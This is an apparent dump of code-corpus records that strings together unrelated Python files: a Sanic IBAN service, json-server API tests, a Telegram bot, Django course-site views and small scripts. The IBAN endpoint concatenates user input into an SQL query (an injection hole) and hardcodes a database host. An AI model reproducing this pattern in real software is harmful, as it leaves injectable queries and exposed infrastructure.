int(time.time())})\n\n@app.route('/v1/heartbeat/db')\nasync def service_heartbeat_db(request):\n\n # setup_database()\n cur = app.db.cursor()\n cur.execute(\"SELECT * FROM tx\")\n app.db.commit()\n\n msg = ''\n while True:\n row = cur.fetchone()\n\n if row == None:\n break\n\n msg = {'tx': [{\"reference\": row[1]}]}\n\n #rows = cur.fetchone()\n # return response.json({\"status\": \"up\", \"service\": \"db.sepa.digital\", \"time\": int(time.time())})\n return response.json(msg)\n\n\n@app.route(\"/inbox\", methods=[\"POST\", \"GET\", 'OPTIONS'])\ndef post_inbox(request):\n open(pwd + \"/../data/inbox.json\", \"a\")\n\n with open(pwd + \"/../data/inbox.json\", 'r') as f:\n inbox = load(f)\n\n if request.json:\n inbox.append(request.json)\n\n with open(pwd + \"/../data/inbox.json\", 'w') as f:\n dump(inbox, f)\n\n if request.json and 'mail' in request.json:\n msg = \"Thanks for your message -- we'll get in touch and reply to \" + \\\n str(request.json['email'])\n elif request.json and 'tel' in request.json:\n msg = \"Thanks for your message -- we'll get in touch and call you at \" + \\\n str(request.json['tel'])\n else:\n msg = \"Aloha! What's your message?\"\n\n return json({\"status\": \"success\", \"message\": msg})\n\n\n@app.route('/v1/iban/', methods=['GET', 'OPTIONS'])\nasync def iban_details(request, iban):\n\n query = \"select * from iban where uuid = '\" + iban + \"'\" # TODO SECURITY \n\n try:\n # setup_database()\n\n # engine = create_engine(\"postgresql://user:pwd@IP:port/db\") # , echo=True\n # conn = engine.connect()\n app.db = psycopg2.connect(\"host='51.158.130.90' port='25120' dbname='iban' user='' password=''\")\n cur = app.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cur.execute(query)\n app.db.commit()\n #else:\n except:\n resp = {\"status\": \"error\", \"message\": \"error -- no db connection\"}\n return response.json(resp)\n\n txData = None\n while True:\n row = cur.fetchone()\n\n if row == None:\n break\n\n txData = row\n\n\n print('######### tx:', str(txData))\n\n if txData is not None:\n log.info(\"claim / entity data -- %s\" % txData['status'] + \" - \" + str(txData['uuid']))\n else:\n log.info(\"claim / entity data -- Error not found\")\n\n resp = {\"status\": \"error\", \"message\": \"404 Error - no tx found\"}\n\n return response.json(resp)\n\n\n# run token/api server\nif __name__ == '__main__':\n env = Env()\n env.read_env()\n \n # app.config.from_object(Settings)\n # log.info(\"DEBUG \" + str(app.config.DEBUG))\n # setup_database()\n\n # app.run(host='0.0.0.0', port=8010, workers=4, debug=app.config.DEBUG, access_log=app.config.DEBUG) # config\n app.run(host='0.0.0.0', port=8010, workers=1, debug=True, access_log=True) # config\n\n\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"190144381","text":"from faker import Faker, Factory\nfrom nose.plugins.attrib import attr\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import *\n\nfrom clients import users\n\n\nclass TestUsers(object):\n fake = Faker()\n\n def __get_minimal_user(self):\n return {'name': self.fake.name()}\n\n def __get_full_user(self, fake):\n return {\n \"name\": fake.name(),\n \"username\": fake.user_name(),\n \"email\": fake.email(),\n \"address\": {\n \"street\": fake.street_name(),\n \"city\": fake.city(),\n \"zipcode\": fake.zipcode() if hasattr(fake, 'zipcode') else None,\n \"geo\": {\n \"lat\": str(fake.latitude()),\n \"lng\": str(fake.longitude())\n }\n },\n \"phone\": fake.phone_number(),\n \"website\": fake.words(1)[0] + \".org\",\n \"company\": {\n \"name\": fake.company(),\n \"catchPhrase\": fake.catch_phrase() if hasattr(fake, 'catch_phrase') else None,\n \"bs\": fake.bs() if hasattr(fake, 'bs') else None\n }\n }\n\n def __get_full_user_en(self):\n return self.__get_full_user(self.fake)\n\n def __get_full_user_localized(self):\n return self.__get_full_user(Factory.create('zh_CN'))\n\n def test_create_user(self):\n \"\"\" Positive test on create user \"\"\"\n for case, json in (('User with minimal data', self.__get_minimal_user()),\n ('User with all data', self.__get_full_user_en()),\n ('User with data in not-ASCII locale', self.__get_full_user_localized())):\n def test():\n prev = users.get()\n users.post(json)\n now = users.get()\n assert_equals(len(prev) + 1, len(now),\n case + \": Users count should increase by 1, \"\n \"was %d but now %s\" % (len(prev), len(now)))\n user_id = now[-1].get('id')\n assert_is_not_none(user_id, case + \": Created record should have id\")\n json.update(id=user_id)\n assert_dict_equal(json, now[-1],\n case + \": Data of the last record should be equal to the data sent + id, \"\n \"sent %s but got %s\" % (json, now[-1]))\n yield test\n\n def test_list_users(self):\n \"\"\" Test that we can get user list \"\"\"\n user_list = users.get()\n assert_is_instance(user_list, list,\n \"Data should be a list but got %s\" % user_list)\n\n def test_filter_by_name(self):\n \"\"\" Test filtering user by name field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_name = user['name']\n user_list = users.get(name=search_name)\n assert_true(len(user_list) >= 1, \"At least one record should be returned, \"\n \"but got %s\" % user_list)\n for user2 in user_list:\n assert_true(search_name in user2['name'], \"Got user that does not match search \"\n \"name (%s): %s\" % (search_name, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_email(self):\n \"\"\" Test filtering user by email field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_email = user['email']\n user_list = users.get(email=search_email)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_email in user2['email'], \"Got user that does not match search \"\n \"email (%s): %s\" % (search_email, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_phone(self):\n \"\"\" Test filtering user by phone field \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_phone = user['phone']\n user_list = users.get(phone=search_phone)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_phone in user2['phone'], \"Got user that does not match search phone \"\n \"(%s): %s\" % (search_phone, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filer_by_zipcode(self):\n \"\"\" Test filtering user by zipcode (inner field) \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_zipcode = user['address']['zipcode']\n user_list = users.get(**{'address.zipcode': search_zipcode})\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\"\n % user_list)\n for user2 in user_list:\n assert_true(search_zipcode in user2['address']['zipcode'], \"Got user that does not \"\n \"match search zipcode (%s): %s\"\n % (search_zipcode, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_filter_by_name_and_email(self):\n \"\"\" Test filtering user by two fields -last_user name and email \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n search_name = user['name']\n search_email = user['email']\n user_list = users.get(name=search_name, email=search_email)\n assert_true(len(user_list) >= 1, \"At least one user should be returned, but got %s\" % user_list)\n for user2 in user_list:\n assert_true(search_email in user2['email'] and search_name in user2['name'],\n \"Got user that does not match search email (%s) and name (%s): %s\"\n % (search_email, search_name, user2))\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n\n def test_full_text_search(self):\n \"\"\" Test full text search \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n for search_token in (user['name'].split()[0],\n user['name'].split()[1],\n user['email'].split('@')[0],\n user['company']['name'],\n user['address']['street'][:3]):\n def test():\n user_list = users.get(q=search_token)\n assert_true(len(user_list) >= 1, \"At least one user should be returned by token '%s', \"\n \"but got %s\" % (search_token, user_list))\n\n # test that no wrong users returned\n def flatten(x):\n return ''.join(flatten(i) if isinstance(i, dict) else unicode(i) for i in x.values())\n for user2 in user_list:\n user2_text = flatten(user2)\n assert_true(search_token.lower() in user2_text.lower(),\n \"User retrieved which does not contain search text (%s): %s\"\n % (search_token, user2))\n\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to \"\n \"data sent + id, sent %s but got %s\" % (user, last_user))\n yield test\n\n def test_filter_by_name_unicode(self):\n \"\"\" Test filter user by unicode name \"\"\"\n user = self.__get_full_user_localized()\n users.post(user)\n search_name = user['name']\n user_list = users.get(name=search_name)\n assert_true(len(user_list) >=1, \"At least one user should be found, but got %s\" % user_list)\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record should be equal to the data sent + id, \"\n \"sent %s but got %s\" % (user, last_user))\n\n def test_full_text_search_unicode(self):\n \"\"\" Test full text search by unicode text \"\"\"\n user = self.__get_full_user_localized()\n users.post(user)\n search_token = user['name'][:2]\n user_list = users.get(q=search_token)\n assert_true(len(user_list) >= 1, \"At least one user should be found, got %s\" % user_list)\n last_user = max(user_list, key=lambda user: user['id'])\n user.update(id=last_user['id'])\n assert_dict_equal(user, last_user, \"Data of the last record shoud be equal to the data sent + id, \"\n \"sent %s but got %s\" % (user, last_user))\n\n def test_replace_user(self):\n \"\"\" Test replace user data by method PUT \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user: user['id'])\n user_id = old_user['id']\n new_user = self.__get_minimal_user()\n users.put(user_id, new_user)\n user_list = users.get()\n last_user = max(user_list, key=lambda user: user['id'])\n new_user.update(id=user_id)\n assert_dict_equal(new_user, last_user)\n\n def test_update_user(self):\n \"\"\" Test update user data by method PATCH\n note: for inner fields whole dict should be replaced (current behavior) \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user:user['id'])\n user_id = old_user['id']\n for new_json in ({'name': self.fake.name()},\n {'address': {'street': self.fake.street_name()}}):\n def test():\n users.patch(user_id, new_json)\n user_list = users.get()\n last_user = max(user_list, key=lambda user: user['id'])\n old_user.update(new_json)\n assert_dict_equal(old_user, last_user)\n yield test\n\n def test_delete_user(self):\n \"\"\" Test delete user by method DELETE \"\"\"\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n old_user = max(user_list, key=lambda user: user['id'])\n user_id = old_user['id']\n users.delete(user_id)\n new_user_list = users.get()\n assert_true(len(filter(lambda user: user['id'] == user_id, new_user_list)) == 0,\n \"Deleted user with id = %d should not be in the list\" % user_id)\n assert_equals(len(user_list) - 1, len(new_user_list),\n \"New user list should be shorter by 1 than list before deletion, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n def test_create_user_with_id(self):\n \"\"\" Test create user with id specified in request \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n user.update(id=user_id)\n users.post(user)\n new_user_list = users.get()\n assert_equals(len(user_list) + 1, len(new_user_list),\n \"Users count should be increased by 1,\"\n \" was %d, now %d\" % (len(user_list), len(new_user_list)))\n assert_equals(user, new_user_list[-1],\n \"User should be created with the id passed, \"\n \"sent %s, created %s\" % (user, new_user_list[-1]))\n\n def test_sequence_after_create_user_with_id(self):\n \"\"\" Test that specifying id in request does not break id sequence for next users \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 2 if user_list else 2\n user.update(id=user_id)\n users.post(user)\n for _ in xrange(2):\n user = self.__get_full_user_en()\n users.post(user)\n user_list = users.get()\n new_user = user_list[-1]\n assert_not_equal(user_id, new_user['id'],\n \"New user should be created with new id, created with %s\" % user_id)\n user.update(id=new_user['id'])\n assert_dict_equal(user, new_user,\n \"New user should be created with the data sent, \"\n \"sent %s, created %s\" % (user, new_user))\n\n @attr(negative=True)\n def test_create_user_with_existing_id(self):\n \"\"\" Negative test on creation user with duplicate id \"\"\"\n user = self.__get_full_user_en()\n user_list = users.get()\n last_user = max(user_list, key=lambda user: user['id'])\n user_id = last_user['id']\n user.update(id=user_id)\n users.post(user)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain the same, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n new_user = filter(lambda user: user['id'] == user_id, user_list)[0]\n assert_equals(last_user, new_user,\n \"User with existing id should remain unchanged, \"\n \"was %s, now %s\" % (last_user, new_user))\n\n @attr(negative=True)\n @SkipTest\n def test_create_user_with_wrong_data(self):\n \"\"\" Test create user with wrong data (list instead of dict)\n This fails, I think this is a bug because this behavior resulting \n to broken json structure, filed https://github.com/typicode/json-server/issues/547\n \"\"\"\n user_list = users.get()\n users.post([{'foo': 'bar'}])\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"User count should remain the same, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_replace_user_with_wrong_id(self):\n \"\"\" Negative test on replace user by method PUT with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n user = self.__get_minimal_user()\n users.put(user_id, user)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_update_user_with_wrong_id(self):\n \"\"\" Negative test on update user by method PATCH with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n json = {'name': self.fake.name()}\n users.patch(user_id, json)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))\n\n @attr(negative=True)\n def test_delete_user_with_wrong_id(self):\n \"\"\" Negative test on delete user by method DELETE with non-existent id \"\"\"\n user_list = users.get()\n user_id = max(user['id'] for user in user_list) + 1 if user_list else 1\n users.delete(user_id)\n new_user_list = users.get()\n assert_equals(len(user_list), len(new_user_list),\n \"Users count should remain unchanged, \"\n \"was %d, now %d\" % (len(user_list), len(new_user_list)))","sub_path":"tests/users-test.py","file_name":"users-test.py","file_ext":"py","file_size_in_byte":17083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454926292","text":"#!/usr/bin/env python3\n\nimport os\nimport pyowm\nimport flask\nimport config\nimport telebot\nimport datetime\nimport requests\nfrom flask import request\nfrom telebot import types\nfrom bs4 import BeautifulSoup\n\nserver = flask.Flask(__name__)\nbot = telebot.TeleBot(config.telegram_token)\n\ndate = datetime.datetime.now()\nweek = datetime.date(date.year, date.month, date.day).isocalendar()[1] % 2\n\nschedule = {\"Понедельник\" : {1:\"8 00 Схемач(Л)\\n9 50 ТМО(Л)\\n11 40 Метрология(П)\\n13 45 Философия(П)\", \n 0:\"8 00 Схемач(Л)\\n9 50 ТМО(Л)\\n11 40 Метрология(П)\"},\n \"Вторник\" : {1:\"8 00 Физ-ра\\n9 50 АВС(Л)\\n11 40 Схемач(П)\", 0:\"8 00 Физ-рa\\n9 50 АВС(Л)\"},\n \"Среда\" : {1:\"9 50 Метрология(Л)\\n11 40 ОС(Л)\", 0:\"9 50 Метрология(Л)\\n11 40 ОС(Л)\"},\n \"Четверг\" : {1:\"8 00 Физ-ра\\n9 50 АВС(Л)\\n11 40 ОС(П)\\n\", 0:\"9 50 АВС(Л)\\n11 40 ОС(П)\\n13 45 философия(Л)\\n\"},\n \"Пятница\" : {1:\"Военка\", 0:\"Военка\"},\n \"Суббота\" : {1:\"8 00 ПВТ(П)\\n9 50 ПВТ(Л)\\n11 40 ТМО(П)\\n\", 0:\"8 00 ПВТ(П)\\n9 50 ПВТ(Л)\"},\n }\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n bot.send_message(message.chat.id, \"Доступные команды:\\n\" + \"/help - Информация\\n\" + \n \"/get - Посмотреть расписание\\n/weather - Посмотреть погоду\")\n\n@bot.message_handler(commands=[\"get\"])\ndef get(message):\n markup = types.ReplyKeyboardMarkup()\n markup.row(\"Понедельник\", \"Вторник\")\n markup.row(\"Среда\", \"Четверг\")\n markup.row(\"Пятница\", \"Суббота\")\n bot.send_message(message.chat.id, \"Выбери день:\", reply_markup=markup)\n\n@bot.message_handler(commands=[\"weather\"])\ndef weather(message):\n owm = pyowm.OWM(config.pyowm_token)\n observation = owm.weather_at_place(\"Novosibirsk\")\n weather = observation.get_weather()\n\n temp = weather.get_temperature(unit=\"celsius\")\n wind = weather.get_wind()\n bot.send_message(message.chat.id, \"Погода в Новосибирске\\nТемпература: \" + \n str(temp['temp']) + \" градуса\\n\" + \"Ветер: \" + str(wind['speed']) + \" м/с\")\n\n@bot.message_handler(commands=[\"music\"])\ndef music(message):\n r = requests.get(\"http://the-radio.ru/radio/europa-plus-r363\")\n soup = BeautifulSoup(r.content, \"html.parser\")\n tag = soup.find_all(\"span\", {\"class\":\"title\"})\n artists = []\n for link in tag:\n artists.append(link.find(\"a\").text)\n song = list(tag[0])\n song_name = str(artists[0]) + song[2]\n \n bot.send_message(message.chat.id, song_name)\n\n@bot.message_handler(content_types=[\"text\"])\ndef repeat_all_messages(message):\n if message.text in schedule:\n bot.send_message(message.chat.id, \"Неделя \" + str(week) + \"\\n\" + \n schedule[message.text][week], reply_markup=types.ReplyKeyboardHide(), parse_mode=\"HTML\")\n\n@server.route(\"/bot\", methods=['POST'])\ndef getMessage():\n bot.process_new_messages(\n [telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\")).message\n ])\n return \"!\", 200\n\n@server.route(\"/\")\ndef webhook():\n bot.remove_webhook()\n bot.set_webhook(url=\"https://nailpwnz.herokuapp.com/bot\")\n return \"!\", 200\n\nserver.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000))\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161862364","text":"import json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom operation.models import UserFavorite\nfrom courses.models import Course\nfrom .models import CourseOrg, CityDict, Teacher\nfrom django.shortcuts import render_to_response\nfrom .forms import UserAskForm\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\n\nclass IndexView(View):\n \"\"\"首页\"\"\"\n def get(self, request):\n\n some_courses = Course.objects.filter(is_banner=False)[:6]\n banner_courses = Course.objects.filter(is_banner=True)[:3]\n\n some_orgs = CourseOrg.objects.filter()[:25]\n return render(request, 'index.html', {\n 'some_courses': some_courses,\n 'banner_courses': banner_courses,\n 'some_orgs': some_orgs\n\n })\n\n\nclass OrgView(View):\n \"\"\"课程机构列表\"\"\"\n def get(self, request):\n all_orgs = CourseOrg.objects.all()\n host_orgs = all_orgs.order_by(\"-click_nums\")[:3]\n all_cities = CityDict.objects.all()\n\n search_keywords = request.GET.get('keywords', '')\n if search_keywords:\n all_orgs = all_orgs.filter(Q(name__icontains=search_keywords) |\n Q(desc__icontains=search_keywords)\n )\n\n # 城市筛选\n city_id = request.GET.get('city', \"\")\n if city_id:\n all_orgs = all_orgs.filter(city_id=int(city_id))\n\n # 类别筛选\n category = request.GET.get(\"ct\", \"\")\n if category:\n all_orgs = all_orgs.filter(category=category)\n\n sort = request.GET.get(\"sort\", \"\")\n if sort == \"student\":\n all_orgs = all_orgs.order_by(\"-students\")\n elif sort == \"courses\":\n all_orgs = all_orgs.order_by(\"-course_nums\")\n\n\n org_nums = all_orgs.count()\n\n # 对课程进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(all_orgs, 5, request=request)\n orgs = p.page(page)\n\n return render(request, \"org-list.html\", {\n \"all_orgs\": orgs,\n \"all_cities\": all_cities,\n \"org_nums\": org_nums,\n \"city_id\": city_id,\n \"category\": category,\n \"host_orgs\": host_orgs,\n \"sort\": sort\n })\n\nclass AddUserAskView(View):\n def post(self, request):\n userask_form = UserAskForm(request.POST)\n if userask_form.is_valid():\n # 本身可以直接save(),而不需要一个一个实例化\n user_ask = userask_form.save(commit=True)\n # ajax 异步操作,返回json\n # msg_dict = {}\n return HttpResponse(json.dumps({'status':'success'}), content_type='application/json')\n else:\n return HttpResponse(json.dumps({'status':'fail', 'msg': '添加出错'}), content_type='application/json')\n\n\nclass OrgHomeView(View):\n \"\"\"\n 机构首页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"home\"\n course_org = CourseOrg.objects.get(id=int(org_id))\n\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n\n\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n return render(request, 'org-detail-homepage.html', {\n 'all_courses': all_courses,\n \"all_teachers\": all_teachers,\n \"course_org\": course_org,\n \"current_page\": current_page,\n \"has_fav\": has_fav\n })\n\n\n\nclass OrgCourseView(View):\n \"\"\"\n 机构课程列表页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"course\"\n course_org = CourseOrg.objects.get(id=int(org_id))\n\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n\n all_courses = course_org.course_set.all()\n\n\n # 对课程进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(all_courses, 15, request=request)\n course = p.page(page)\n\n return render(request, 'org-detail-course.html', {\n 'all_courses': course,\n \"course_org\": course_org,\n \"current_page\": current_page,\n \"has_fav\": has_fav\n\n })\n\n\nclass OrgDescView(View):\n \"\"\"\n 机构介绍页\n \"\"\"\n\n def get(self, request, org_id):\n current_page = \"desc\"\n course_org = CourseOrg.objects.get(id=int(org_id))\n\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n\n return render(request, 'org-detail-desc.html', {\n \"course_org\": course_org,\n \"current_page\": current_page,\n \"has_fav\": has_fav\n\n })\n\nclass OrgTeacherView(View):\n \"\"\"\n 机构中的讲师列表页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"teacher\"\n course_org = CourseOrg.objects.get(id=int(org_id))\n all_teachers = course_org.teacher_set.all()\n\n # 对教师进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(all_teachers, 5, request=request)\n all_teachers = p.page(page)\n\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n\n return render(request, 'org-detail-teachers.html', {\n 'all_teachers': all_teachers,\n \"course_org\": course_org,\n \"current_page\": current_page,\n \"has_fav\": has_fav\n\n })\n\nclass AddFavView(View):\n \"\"\"\n 用户收藏以及取消收藏\n \"\"\"\n def post(self, request):\n fav_id = request.POST.get(\"fav_id\", 0)\n fav_type = request.POST.get(\"fav_type\", \"\")\n\n # 判断用户登录状态\n if not request.user.is_authenticated():\n return HttpResponse(json.dumps({'status': 'fail', 'msg': '请先登录'}), content_type='application/json')\n\n exit_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=fav_type)\n # 记录已经存在, 则取消收藏\n if exit_records:\n exit_records.delete()\n return HttpResponse(json.dumps({'status': 'success', 'msg': '收藏'}), content_type='application/json')\n\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.user = request.user\n user_fav.fav_id = int(fav_id)\n user_fav.fav_type = int(fav_type)\n user_fav.save()\n return HttpResponse(json.dumps({'status': 'success', 'msg': '已收藏'}), content_type='application/json')\n\n else:\n return HttpResponse(json.dumps({'status': 'fail', 'msg': '收藏出错'}), content_type='application/json')\n\nclass TeacherListView(View):\n \"\"\"顶层授课教师页面\"\"\"\n def get(self, request):\n all_teachers = Teacher.objects.all()\n\n hot_teachers = Teacher.objects.all().order_by('-exp')\n teacher_count = Teacher.objects.all().count()\n\n sort = request.GET.get('sort', '')\n if sort == 'hot':\n all_teachers = Teacher.objects.all().order_by('-fans')\n\n search_keywords = request.GET.get('keywords', '')\n if search_keywords:\n all_teachers = all_teachers.filter(Q(teacher_name__icontains=search_keywords) |\n Q(teacher_desc__icontains=search_keywords)\n )\n\n # 对课程进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(all_teachers, 5, request=request)\n all_teachers = p.page(page)\n\n return render(request, 'teacher-list.html', {\n 'all_teachers': all_teachers,\n 'hot_teachers': hot_teachers[:10],\n 'sort': sort,\n 'teacher_count': teacher_count\n })\n\nclass TeacherDetailView(View):\n \"\"\"教师详情页\"\"\"\n def get(self, requests, teacher_id):\n teacher = Teacher.objects.get(id=int(teacher_id))\n\n hot_teachers = Teacher.objects.all().order_by('-fans')\n\n return render(requests, 'teacher-detail.html', {\n 'teacher': teacher,\n 'hot_teachers': hot_teachers[:5]\n })","sub_path":"MxOnline/apps/organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"535904993","text":"import sys\nimport getopt\n\n\ndef usage():\n return 'Usage : cli_opt_demo.py –n or cli_opt_demo.py --name '\n\n\ndef run(arguments):\n try:\n opts, args = getopt.getopt(arguments, \"ho:v\", [\"help\", \"output=\"])\n # The return value consists of two elements: the first is a list of (option, value) pairs; the second is the list of program arguments left after the option list was stripped (this is a trailing slice of args).\n except getopt.GetoptError as err:\n # print help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2) # passing 2 for cli errors (0 is default and 1 is all other types of errors)\n\n output = None\n verbose = False\n for option, argument in opts:\n print(option)\n if option == \"-v\":\n verbose = True\n elif option in (\"-h\", \"--help\"):\n print(usage())\n sys.exit()\n elif option in (\"-o\", \"--output\"):\n output = argument\n else:\n assert False, \"unhandled option\"\n\n print(output)\n\n\nif __name__ == \"__main__\" :\n run(sys.argv[1:])","sub_path":"modules/cli_opt_demo.py","file_name":"cli_opt_demo.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"422848566","text":"import random\ny = random.randint(1,10)\nprint(y)\nnum = 0\ncount = 0\nwhile (num != y and count < 3):\n try:\n num = int(input('Please enter a number between 1 - 10: '))\n if y== num:\n print( \"Congratulation you guessed the right number\")\n elif abs(y-num) == 1:\n print(\"You are Hot\")\n count+=1\n print(\"count = \", count)\n elif abs(y-num) == 2:\n print(\"You are Warm\")\n count += 1\n print(\"count = \", count)\n else:\n print(\"You are Cold\")\n count += 1\n print(\"count = \", count)\n except:\n print(\"Invalid input, \", end=\" \")\n\n","sub_path":"randNgen2.py","file_name":"randNgen2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565040883","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/gpl/software/python/corrfitter/examples/etas-Ds.py\n# Compiled at: 2017-02-13 12:39:10\n# Size of source mod 2**32: 5325 bytes\nfrom __future__ import print_function\nimport collections, sys, h5py, gvar as gv, numpy as np, corrfitter as cf\nSHOWPLOTS = True\n\ndef main():\n data = make_data('etas-Ds.h5')\n fitter = cf.CorrFitter(models=make_models(), svdcut=1e-05)\n p0 = None\n for N in [1, 2, 3, 4]:\n print(30 * '=', 'nterm =', N)\n prior = make_prior(N)\n fit = fitter.lsqfit(data=data, prior=prior, p0=p0)\n print(fit.format(pstyle=None if N < 4 else 'v'))\n p0 = fit.pmean\n\n print_results(fit, prior, data)\n if SHOWPLOTS:\n fit.show_plots()\n test_fit(fitter, 'etas-Ds.h5')\n\n\ndef test_fit(fitter, datafile):\n \"\"\" Test the fit with simulated data \"\"\"\n gv.ranseed(98)\n print('\\nRandom seed:', gv.ranseed.seed)\n dataset = h5py.File(datafile)\n pexact = fitter.fit.pmean\n prior = fitter.fit.prior\n for spdata in fitter.simulated_pdata_iter(n=2, dataset=dataset, pexact=pexact):\n print('\\n============================== simulation')\n sfit = fitter.lsqfit(pdata=spdata, prior=prior, p0=pexact)\n print(sfit.format(pstyle=None))\n diff = {}\n for k in ['etas:a', 'etas:dE', 'Ds:a', 'Ds:dE', 'Vnn']:\n p_k = sfit.p[k].flat[0]\n pex_k = pexact[k].flat[0]\n print('{:>10}: fit = {} exact = {:<9.5} diff = {}'.format(k, p_k, pex_k, p_k - pex_k))\n diff[k] = p_k - pex_k\n\n print('\\nAccuracy of key parameters: ' + gv.fmt_chi2(gv.chi2(diff)))\n\n\ndef make_data(datafile):\n \"\"\" Read data from datafile and average it. \"\"\"\n dset = cf.read_dataset(datafile)\n return gv.dataset.avg_data(dset)\n\n\ndef make_models():\n \"\"\" Create models to fit data. \"\"\"\n tmin = 5\n tp = 64\n models = [\n cf.Corr2(datatag='etas', tp=tp, tmin=tmin, a='etas:a', b='etas:a', dE='etas:dE'),\n 